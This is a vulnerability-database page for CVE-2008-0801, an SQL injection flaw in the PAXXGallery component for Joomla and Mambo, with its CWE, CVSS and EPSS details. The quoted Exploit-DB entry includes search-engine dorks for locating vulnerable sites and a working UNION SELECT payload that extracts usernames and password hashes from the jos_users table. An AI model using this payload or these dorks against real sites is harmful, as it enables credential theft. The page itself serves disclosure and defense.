CVE-2008-0801 : Detail

CVE-2008-0801

SQL Injection
A03-Injection
0.26%V3
Network
2008-02-15
20h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in index.php in the PAXXGallery (com_paxxgallery) 0.2 component for Mambo and Joomla! allow remote attackers to execute arbitrary SQL commands via (1) the iid parameter in a view action, and possibly (2) the userid parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5117

Publication date : 2008-02-13 23h00 +00:00
Author : S@BUN
EDB Verified : Yes

############################################################### # # joomla SQL Injection(com_paxxgallery) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # http://www.hackturkiye.com # # MAÄ°L : hackturkiye.hackturkiye@gmail.com # # ################################################################ # # DORK 1 : allinurl: com_paxxgallery "iid" # # DORK 2 : allinurl: com_paxxgallery "userid" # ################################################################ EXPLOIT : AFTER userid ADD EXPLÄ°OT(USERÄ°D DEN SONRA EXPLOÄ°T EKLE) EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOÄ°T EXPLOIT== S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ <name>paxxgallery</name> <author>Tobias Floery</author> <copyright>(c) Tobias Floery</copyright> <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license> <authorEmail>tobias@floery.net</authorEmail> <authorUrl>www.floery.net</authorUrl> <version>0.2</version> <creationDate>07.01.2006</creationDate> <description> <![CDATA[ <h1>The PHP AjaX Gallery</h1> PAXXGallery is a PHP and JS Gallery Component for Joomla using AJAX Technology. The component is designed to work even with Safe- Mode: ON! servers and a FTP Upload is integrated. ]]> </description> # milw0rm.com [2008-02-14]

Products Mentioned

Configuraton 0

Paxxgallery>>Com_paxxgallery >> Version 0.2

    Joomla>>Joomla\! >> Version *

    Mambo-foundation>>Mambo >> Version *

      References

      http://www.securityfocus.com/bid/27811
      Tags : vdb-entry, x_refsource_BID
      https://www.exploit-db.com/exploits/5117
      Tags : exploit, x_refsource_EXPLOIT-DB